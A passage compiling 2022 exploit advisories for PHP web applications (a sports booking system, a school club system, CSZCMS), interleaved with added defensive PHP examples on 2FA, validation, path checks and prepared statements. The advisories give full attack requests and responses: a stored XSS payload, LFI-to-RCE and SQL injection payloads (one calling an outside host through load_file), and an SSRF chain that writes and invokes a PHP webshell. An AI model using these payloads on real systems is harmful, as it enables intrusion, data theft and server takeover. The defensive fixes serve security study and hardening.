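// flow that closes both weaknesses described above by binding every 2FA step to a
// server-side record that only a correct password can create. $SESSION stands in for
// $_SESSION, setAuthCookie() for wp_set_auth_cookie(); the user record is constructed.
declare(strict_types=1);

const MAX_BACKUP_ATTEMPTS = 5;   // per pending login; assumed policy

// Constructed user store. Backup codes are kept hashed, so a database read (the SQL
// injection chaining described above) does not yield usable codes.
$USERS = [
    7 => [
        'password_hash'      => password_hash('correct horse battery staple', PASSWORD_DEFAULT),
        'totp_configured'    => false,
        'backup_code_hashes' => [password_hash('12345678', PASSWORD_DEFAULT)],
    ],
];
$SESSION = [];

function setAuthCookie(int $userId): string
{
    return "auth-cookie-for-user-$userId";
}

// Step 1: only a correct password creates the pending-2FA record. Every later step
// takes the user id from this record, never from a request parameter such as sg-user-id.
function firstFactor(array $users, array &$session, int $userId, string $password): bool
{
    $user = $users[$userId] ?? null;
    if ($user === null || !password_verify($password, $user['password_hash'])) {
        return false;
    }
    $session['pending_2fa'] = ['user_id' => $userId, 'expires' => time() + 300, 'attempts' => 0];
    return true;
}

function pendingUserId(array $session): ?int
{
    $p = $session['pending_2fa'] ?? null;
    return ($p !== null && $p['expires'] > time()) ? $p['user_id'] : null;
}

// Step 2a: the initial-setup secret (what the QR code encodes) is only issued to the
// user who just passed step 1 and has not enrolled yet.
function initialSetupSecret(array $users, array $session): ?string
{
    $uid = pendingUserId($session);
    if ($uid === null || $users[$uid]['totp_configured']) {
        return null;
    }
    return bin2hex(random_bytes(10));   // stand-in for a real TOTP secret
}

// Step 2b: a backup code also requires step 1, is single-use, and is attempt-limited
// so an 8-digit numeric code cannot simply be enumerated.
function backupCodeLogin(array &$users, array &$session, string $code): ?string
{
    $uid = pendingUserId($session);
    if ($uid === null || $session['pending_2fa']['attempts'] >= MAX_BACKUP_ATTEMPTS) {
        return null;
    }
    $session['pending_2fa']['attempts']++;
    foreach ($users[$uid]['backup_code_hashes'] as $i => $hash) {
        if (password_verify($code, $hash)) {
            unset($users[$uid]['backup_code_hashes'][$i]);   // burn the code
            unset($session['pending_2fa']);
            return setAuthCookie($uid);
        }
    }
    return null;
}

// Without the password step, neither second-factor path yields anything.
var_dump(initialSetupSecret($USERS, $SESSION));
var_dump(backupCodeLogin($USERS, $SESSION, '12345678'));

// After the password step, the setup secret and the backup-code login become
// available, and only for the verified user.
firstFactor($USERS, $SESSION, 7, 'correct horse battery staple');
var_dump(initialSetupSecret($USERS, $SESSION) !== null);
var_dump(backupCodeLogin($USERS, $SESSION, '12345678'));
```

The first two calls return null because no pending record exists; after `firstFactor()` succeeds, the setup secret is issued and the backup code logs the verified user in and is then consumed. The attempt counter lives in the pending record, so each password-verified login gets at most `MAX_BACKUP_ATTEMPTS` guesses, which is the control that makes an 8-digit numeric code impractical to brute force.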
<pre><code>Title: Online Sports Complex Booking System 1.0 XSS<br />Author: Zllggggg<br />Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html<br />Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip<br />Reference: https://github.com/playZG/Exploit-/blob/main/Online%20Sports%20Complex%20Booking%20System/Online%20Sports%20Complex%20Booking%20System%201.0%20XSS%20loophole.md<br />Tested on: Windows, MySQL, Apache<br /><br />Description:<br /><br />When registering a user on the front end, capture the request with Burp Suite while submitting the form. Modify the email parameter to <script>alert(1)</script> and send the packet. Then log in to the back end with the administrator account and click Registered Clients to trigger the pop-up window.<br /><br />Data packet<br />POST /scbs/classes/Users.php?f=save_client HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------289647566033806702832762971625<br />Content-Length: 1284<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/scbs/register.php<br />Cookie: PHPSESSID=trkbdt4th4hlsp7bpriuih1816<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="id"<br /><br />1<br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="firstname"<br /><br />ca<br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="middlename"<br /><br />ca<br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="lastname"<br /><br />ca<br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="gender"<br /><br />Male<br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="contact"<br /><br />ca<br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="address"<br /><br />ca<br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="email"<br /><br /><script>alert(1)</script><br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="password"<br /><br />123<br />-----------------------------289647566033806702832762971625<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------289647566033806702832762971625--<br /></code></pre>
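The `save_client` request above is an AJAX call whose fields are typed (an email, names, a gender), so the stored value can be checked for shape before it is ever written. As an added example, not the Online Sports Complex Booking System's code, the handler below validates those fields and answers with the JSON the `XMLHttpRequest` caller expects. Field names follow the captured request; the accepted gender values, the name character class and the reply shape are assumptions.

```php
<?php
// Added example, not the Online Sports Complex Booking System's code: server-side
// validation for the save_client request shown above. The admin "registered clients"
// page renders the email field, so a value that is not an email should be refused
// before it is stored. Field names follow the captured request; the accepted gender
// values, the name character class and the JSON reply shape are assumptions.
declare(strict_types=1);

// Returns [] when the typed fields are acceptable, otherwise field => reason.
function validateClient(array $post): array
{
    $errors = [];
    if (filter_var(trim($post['email'] ?? ''), FILTER_VALIDATE_EMAIL) === false) {
        $errors['email'] = 'must be a valid email address';
    }
    foreach (['firstname', 'middlename', 'lastname'] as $f) {
        // letters, spaces, hyphens and apostrophes only, so markup is rejected outright
        if (!preg_match('/^[\p{L} \'\-]{1,60}$/u', $post[$f] ?? '')) {
            $errors[$f] = 'contains characters that are not allowed';
        }
    }
    if (!in_array($post['gender'] ?? '', ['Male', 'Female'], true)) {
        $errors['gender'] = 'unexpected value';
    }
    return $errors;
}

// What the save_client handler would send back to the XMLHttpRequest caller.
function saveClientResponse(array $post): string
{
    $errors = validateClient($post);
    $status = $errors === [] ? 'success' : 'failed';
    return json_encode(['status' => $status, 'errors' => $errors], JSON_THROW_ON_ERROR);
}

// Constructed requests: the advisory's payload in the email field, and a clean one.
$tampered = ['firstname' => 'ca', 'middlename' => 'ca', 'lastname' => 'ca',
             'gender' => 'Male', 'email' => '<script>alert(1)</script>'];
$clean    = ['firstname' => 'Ada', 'middlename' => 'M', 'lastname' => "O'Neil",
             'gender' => 'Female', 'email' => 'ada@example.com'];

echo saveClientResponse($tampered), PHP_EOL;
echo saveClientResponse($clean), PHP_EOL;
```

The tampered request is refused on the email field and never reaches the database, while the clean one passes. Validation is a first gate, not a substitute for encoding: the admin page must still HTML-encode these values when it renders them, since a legitimate surname such as O'Neil contains a quote character that is only safe once encoded for its output context.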
<pre><code># Title: School Club Application System 1.0 LFI To RCE<br /># Author: Hejap Zairy<br /># Date: 08.04.2022<br /># Vendor: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scas_0.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /><br /><br />#vulnerability Code php<br />Needs more filtering require_once<br /><br />```<br /><?php <br />require_once('config.php');<br />$page = isset($_GET['page']) ? $_GET['page'] : 'home';<br />$page_name = explode("/",$page)[count(explode("/",$page)) -1];<br />?><br />```<br /><br />[+] Payload GET<br /><br /><br />```<br />GET /scas/?page=../../0day&515=dir HTTP/1.1<br />Host: 0day.gov<br />Cache-Control: max-age=0<br />sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: ar,en-US;q=0.9,en;q=0.8<br />Cookie: PHPSESSID=edh1ho9c9skog6v2ns0n0j3f2k<br />Connection: close<br /><br /><br />```<br /><br /><br />#Status: CRITICAL<br /><br />#Response <br />```<br />HTTP/1.1 200 OK<br />Date: Fri, 08 Apr 2022 04:05:58 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-Powered-By: PHP/7.4.27<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Access-Control-Allow-Origin: *<br />Connection: close<br 
/>Content-Type: text/html; charset=UTF-8<br />Content-Length: 13563<br /><br /></h1><br /> <p class="lead text-white mt-3">.. .. 0day Page</p><br /> </div><br /> </div><br /> </div><br /> </div><br /> </header><br /> <div class="card card-body blur shadow-blur mx-3 mx-md-4 mt-n6"><br /> Volume in drive C is OS<br /> Volume Serial Number is 2EF1-9DCA<br /><br /> Directory of C:\xampp\htdocs\scas<br /><br />04/08/2022 06:27 AM <DIR> .<br />04/08/2022 06:27 AM <DIR> ..<br />03/19/2021 01:17 PM 225 .htaccess<br />04/07/2022 10:03 AM 2,115 about.html<br />03/30/2022 04:31 PM 220 about.php<br />04/07/2022 03:56 PM <DIR> admin<br />04/08/2022 06:27 AM <DIR> assets<br />03/29/2022 04:17 PM <DIR> classes<br />04/07/2022 03:20 PM <DIR> clubs<br />04/07/2022 04:33 PM <DIR> club_admin<br />04/07/2022 02:39 PM <DIR> club_contents<br />03/30/2022 10:03 AM 1,297 config.php<br />04/07/2022 05:13 PM <DIR> database<br />03/30/2022 04:31 PM 256 home.php<br />03/29/2022 10:24 AM <DIR> includes<br />04/07/2022 03:18 PM 3,010 index.php<br />04/07/2022 09:35 AM 647 initialize.php<br />04/07/2022 08:18 AM <DIR> uploads<br />04/07/2022 10:03 AM 1,842 welcome.html<br /> 8 File(s) 9,612 bytes<br /> 11 Dir(s) 81,520,218,112 bytes free<br /> </div><br /><br />```<br /><br /># Description:<br />Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on the web server; when the included file can be executed, the inclusion is converted into remote code execution.<br /><br /># Proof and Exploit:<br />https://i.imgur.com/3MbzZuQ.png<br />https://i.imgur.com/mqXb1Mc.png<br /></code></pre>
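A hardened replacement for the `page` handling quoted in the advisory above, added here as an example and not taken from the scas project; the `pages/` directory that holds the includable views is an assumption.

```php
<?php
// Added example, not code from the scas project: replaces the `$page`
// handling shown in the advisory. Only names such as "home" or
// "clubs/view_details" are accepted, they are resolved under an assumed
// pages directory, and anything whose real path escapes that directory
// (for instance "../../0day") is rejected before require_once runs.
declare(strict_types=1);

require_once 'config.php';

// Assumption: includable views live under this directory, one "<name>.php" each.
const PAGES_DIR = __DIR__ . '/pages';

function resolve_page(string $requested, string $pagesDir = PAGES_DIR): ?string
{
    // Letters, digits, underscore and hyphen, with at most one "/" segment.
    // No dots at all, so "..", explicit ".php" suffixes and hidden files
    // cannot be expressed in the parameter.
    if (!preg_match('~^[A-Za-z0-9_-]+(?:/[A-Za-z0-9_-]+)?$~', $requested)) {
        return null;
    }

    $base = realpath($pagesDir);
    $candidate = realpath($pagesDir . '/' . $requested . '.php');
    if ($base === false || $candidate === false) {
        return null; // pages directory missing or no such view file
    }

    // Second, independent check: even if the pattern above were loosened
    // later, the resolved path must still sit below the pages directory.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

$requested = isset($_GET['page']) && is_string($_GET['page']) ? $_GET['page'] : 'home';
$file = resolve_page($requested);
if ($file === null) {
    // Log the rejected value server-side: repeated rejections containing
    // "../" are the signal a defender wants to see for this bug class.
    error_log('rejected page parameter: ' . var_export($requested, true));
    http_response_code(404);
    exit('Page not found');
}
require_once $file;
```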
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/e087725b01dded75d85a20db58335fa8.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Ptakks.XP.a<br />Vulnerability: Insecure Credential Storage<br />Description: The default password for the backdoor FTP is stored in cleartext within the ptakks.ini file.<br />Family: Ptakks<br />Type: PE32<br />MD5: e087725b01dded75d85a20db58335fa8<br />Vuln ID: MVID-2022-0537<br />Disclosure: 04/06/2022<br /><br />Exploit/PoC:<br />"ptakks.ini"<br /><br />[FTP]<br />servidor=192.168.18.125<br />puerto=21<br />usuario=usuario<br />password=password<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>## Title: School Club Application System v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 04.07.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Club-Application<br /><br />## Description:<br />The `id` parameter appears to be vulnerable to three types of SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+'<br />was submitted in the id parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain.<br />The application interacted with that domain, indicating that the injected SQL query was executed.<br />The attacker can take control of the administrator account and of all other accounts on this system, and can also download all information about this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: page=clubs/view_details&id=2'+(select<br />load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+''<br />OR NOT 2914=2914-- erOW<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: page=clubs/view_details&id=2'+(select<br
/>load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+''<br />OR (SELECT 2308 FROM(SELECT COUNT(*),CONCAT(0x7176787a71,(SELECT<br />(ELT(2308=2308,1))),0x717a6b7a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VAfL<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=clubs/view_details&id=2'+(select<br />load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+''<br />AND (SELECT 8537 FROM (SELECT(SLEEP(5)))TWcu)-- jivn<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 8 columns<br /> Payload: page=clubs/view_details&id=2'+(select<br />load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+''<br />UNION ALL SELECT<br />CONCAT(0x7176787a71,0x7468764e617048694a74717a4f53734a6956786e7a4a56774b48427a7645474c414847756f704641,0x717a6b7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL--<br />-<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Club-Application)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/lpwxr4)<br /><br /><br /></code></pre>
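The parameterised counterpart for the `clubs/view_details` page's `id` lookup, added here as an example rather than taken from the application; the `clubs` table, its columns, the DSN and the account name are assumptions.

```php
<?php
// Added example, not code from the School Club Application System: reading
// the `id` parameter of clubs/view_details without string concatenation.
// Table/column names, the DSN and the DB account are assumptions.
declare(strict_types=1);

function fetch_club(PDO $pdo, $rawId): ?array
{
    // Reject anything that is not a positive integer before it reaches SQL.
    // A value such as 2'+(select load_file(...))+'' fails here, as does an
    // array smuggled in as id[]=... (filter_var returns false for arrays).
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // The query text is fixed; the value travels as a bound parameter, so the
    // server never parses attacker-controlled characters as SQL.
    $stmt = $pdo->prepare('SELECT id, name, description FROM clubs WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// The load_file() sub-query in the advisory also relies on the MySQL account
// holding the FILE privilege. Create the application account without it,
// e.g. (run as the MySQL root user; names are assumptions):
//   CREATE USER 'scas_app'@'localhost' IDENTIFIED BY '<strong password>';
//   GRANT SELECT, INSERT, UPDATE, DELETE ON scas_db.* TO 'scas_app'@'localhost';
$pdo = new PDO('mysql:host=localhost;dbname=scas_db;charset=utf8mb4', 'scas_app', 'change-me', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
]);

$club = fetch_club($pdo, $_GET['id'] ?? '');
if ($club === null) {
    http_response_code(404);
    exit('Club not found');
}
echo htmlspecialchars($club['name'], ENT_QUOTES, 'UTF-8');
```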
<pre><code># Title: CSZCMS V1.3.0 - SSRF To LFI To RCE<br /># Author: Hejap Zairy<br /># Date: 07.04.2022<br /># Vendor: https://sourceforge.net/projects/cszcms/files/install/<br /># Software: https://liquidtelecom.dl.sourceforge.net/project/cszcms/install/CSZCMS-V1.3.0.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /># 1 - Inject SSRF<br /># 2 - Chain the SSRF to LFI<br /># 3 - Chain SSRF to LFI to RCE by writing a webshell into a config file<br /><br /># Vulnerable code (PHP)<br />The file manager connector's commands need more filtering:<br /><br />```<br />protected static $base64encodeSessionData = false;<br />protected $commands = array(<br /> 'abort' => array('id' => true),<br /> 'archive' => array('targets' => true, 'type' => true, 'mimes' => false, 'name' => false),<br /> 'callback' => array('node' => true, 'json' => false, 'bind' => false, 'done' => false),<br /> 'chmod' => array('targets' => true, 'mode' => true),<br /> 'dim' => array('target' => true, 'substitute' => false),<br /> 'duplicate' => array('targets' => true, 'suffix' => false),<br /> 'editor' => array('name' => true, 'method' => true, 'args' => false),<br /> 'extract' => array('target' => true, 'mimes' => false, 'makedir' => false),<br /> 'file' => array('target' => true, 'download' => false, 'cpath' => false, 'onetime' => false),<br /> 'get' => array('target' => true, 'conv' => false),<br /> 'info' => array('targets' => true, 'compare' => false),<br /> 'ls' => array('target' => true, 'mimes' => false, 'intersect' => false),<br /> 'mkdir' => array('target' => true, 'name' => false, 'dirs' => false),<br /> 'mkfile' => array('target' => true, 'name' => true, 'mimes' => false),<br /> 'netmount' => array('protocol' => true, 'host' => true, 'path' => false, 'port' => false, 'user' => false, 'pass' => false, 'alias' => false, 'options' => false),<br /> 'open' => array('target' => false, 'tree' => false, 'init' => false, 'mimes' => false, 'compare' => false),<br /> 'parents' 
=> array('target' => true, 'until' => false),<br /> 'paste' => array('dst' => true, 'targets' => true, 'cut' => false, 'mimes' => false, 'renames' => false, 'hashes' => false, 'suffix' => false),<br /> 'put' => array('target' => true, 'content' => '', 'mimes' => false, 'encoding' => false),<br /> 'rename' => array('target' => true, 'name' => true, 'mimes' => false, 'targets' => false, 'q' => false),<br /> 'resize' => array('target' => true, 'width' => false, 'height' => false, 'mode' => false, 'x' => false, 'y' => false, 'degree' => false, 'quality' => false, 'bg' => false),<br /> 'rm' => array('targets' => true),<br /> 'search' => array('q' => true, 'mimes' => false, 'target' => false, 'type' => false),<br /> 'size' => array('targets' => true),<br /> 'subdirs' => array('targets' => true),<br /> 'tmb' => array('targets' => true),<br /> 'tree' => array('target' => true),<br /> 'upload' => array('target' => true, 'FILES' => true, 'mimes' => false, 'html' => false, 'upload' => false, 'name' => false, 'upload_path' => false, 'chunk' => false, 'cid' => false, 'node' => false, 'renames' => false, 'hashes' => false, 'suffix' => false, 'mtime' => false, 'overwrite' => false, 'contentSaveId' => false),<br /> 'url' => array('target' => true, 'options' => false),<br /> 'zipdl' => array('targets' => true, 'download' => false)<br /> );<br />```<br /><br />[+] Payload GET<br /><br />#l1_MGRheS5waHA= base64 decode 0day.php<br />#l3_Y3N6ZGVmYXVsdC9tYWluLnBocA base64 decode main.php<br /><br /><br />```<br />GET /cms/index.php/admin/filemanager/connector/?cmd=get&targets=http://127.0.0.1/cms/index.php/admin/filemanager/connector/?cmd=file&target=l1_MGRheS5waHA= HTTP/1.1<br />Host: 127.0.0.1<br />sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36<br />Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: ar,en-US;q=0.9,en;q=0.8<br />Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=h0nht0te0u73bbvu8e12lt2bmvfbepfn<br />Connection: close<br /><br /><br />```<br /><br /><br />#Status: CRITICAL<br /><br />#Response <br />```<br />{"content":"data:image\/png;base64,PD89YCRfR0VUWzUxNV1gPz4NCg=="}<br /># <?=`$_GET[515]`?> decode base64 <br /><br />```<br /><br /><br /><br /><br /># Requests <br />```<br />POST /cms/admin/filemanager/connector/ HTTP/1.1<br />Host: 127.0.0.1<br />Content-Length: 128<br />sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://127.0.0.1<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://127.0.0.1/cms/admin/filemanager<br />Accept-Encoding: gzip, deflate<br />Accept-Language: ar,en-US;q=0.9,en;q=0.8<br />Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed<br />Connection: close<br /><br />cmd=put&target=l6_Y29uZmlnX2V4YW1wbGUuaW5jLnBocA&encoding=UTF-8&content=%3C%3F%3D%60%24_GET%5B515%5D%60%3F%3E&reqid=18002b807a32<br />```<br /><br /><br /><br /><br /><br /><br /><br />#Response <br /><br />```<br />HTTP/1.1 200 OK<br />Date: Thu, 07 Apr 2022 06:31:19 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-XSS-Protection: 1; mode=block<br />X-Frame-Options: SAMEORIGIN<br 
/>X-Content-Type-Options: nosniff<br />X-Powered-By: PHP/7.4.27<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: max-age=3600, must-revalidate<br />Pragma: no-cache<br />Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly<br />Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; path=/; domain=127.0.0.1; HttpOnly<br />Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly<br />Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly<br />Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly<br />Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly<br />Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly<br />Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly<br />Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly<br />Content-Length: 190<br />Connection: keep-alive, close<br />Content-Type: application/json; charset=utf-8<br /><br 
/>{"changed":[{"isowner":false,"ts":1649313079,"mime":"text\/x-php","read":1,"write":1,"size":"17","hash":"l6_Y29uZmlnX2V4YW1wbGUuaW5jLnBocA","name":"config_example.inc.php","phash":"l6_Lw"}]}<br />```<br /><br /><br /><br /><br /><br /><br />#webshell<br /><br />```<br />GET /cms/config_example.inc.php?515=dir HTTP/1.1<br />Host: 127.0.0.1<br />Cache-Control: max-age=0<br />sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: ar,en-US;q=0.9,en;q=0.8<br />Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed<br />Connection: close<br /><br /><br />```<br /><br /><br /><br />#response <br /><br />```<br />HTTP/1.1 200 OK<br />Date: Thu, 07 Apr 2022 06:37:33 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-XSS-Protection: 1; mode=block<br />X-Frame-Options: SAMEORIGIN<br />X-Content-Type-Options: nosniff<br />X-Powered-By: PHP/7.4.27<br />Connection: keep-alive, close<br />Cache-Control: max-age=3600, must-revalidate<br />Content-Length: 1917<br />Content-Type: text/html; charset=UTF-8<br /><br /> Volume in drive C is OS<br /> Volume Serial Number is 2EF1-9DCA<br /><br /> Directory of C:\xampp\htdocs\cms<br /><br />04/07/2022 09:13 AM <DIR> .<br />04/07/2022 02:23 AM <DIR> ..<br />04/30/2019 05:29 PM 